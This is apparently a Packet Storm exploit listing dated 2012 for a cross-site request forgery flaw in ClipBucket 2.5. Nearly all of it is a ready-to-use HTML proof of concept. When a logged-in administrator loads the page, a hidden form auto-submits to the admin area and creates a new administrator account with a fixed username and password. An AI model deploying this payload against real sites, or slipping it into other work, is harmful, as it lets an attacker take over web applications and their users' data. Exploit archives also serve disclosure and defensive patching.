ClipBucket 2.5 Cross Site Request Forgery

2012-08-18T00:00:00
ID PACKETSTORM:115693
Type packetstorm
Reporter DaOne
Modified 2012-08-18T00:00:00

Description

                                        
                                            `##########################################  
[~] Exploit Title: ClipBucket 2.5 CSRF Vulnerability  
[~] Author: DaOne [LCA]  
[~] Date: 15/8/2012  
[~] Software Link: http://clip-bucket.com/  
[~] Or: http://sourceforge.net/projects/clipbucket/  
##########################################  
  
[#] [ CSRF Add Admin ]  
  
<html>  
<body onload="document.form0.submit();">  
<form method="POST" name="form0" action="http://[target]/admin_area/add_member.php">  
<input type="hidden" name="username" value="webadmin"/>  
<input type="hidden" name="email" value="admin@email.com"/>  
<input type="hidden" name="password" value="pass123"/>  
<input type="hidden" name="cpassword" value="pass123"/>  
<input type="hidden" name="country" value="CA"/>  
<input type="hidden" name="gender" value="Male"/>  
<input type="hidden" name="dob" value="1989-10-14"/>  
<input type="hidden" name="category" value="1"/>  
<input type="hidden" name="level" value="1"/>  
<input type="hidden" name="active" value="Ok"/>  
<input type="hidden" name="add_member" value="Add Member"/>  
</form>  
</body>  
</html>  
  
##########################################  
[*] thanks to : * Ly.Lolsec *  
##########################################  
  
`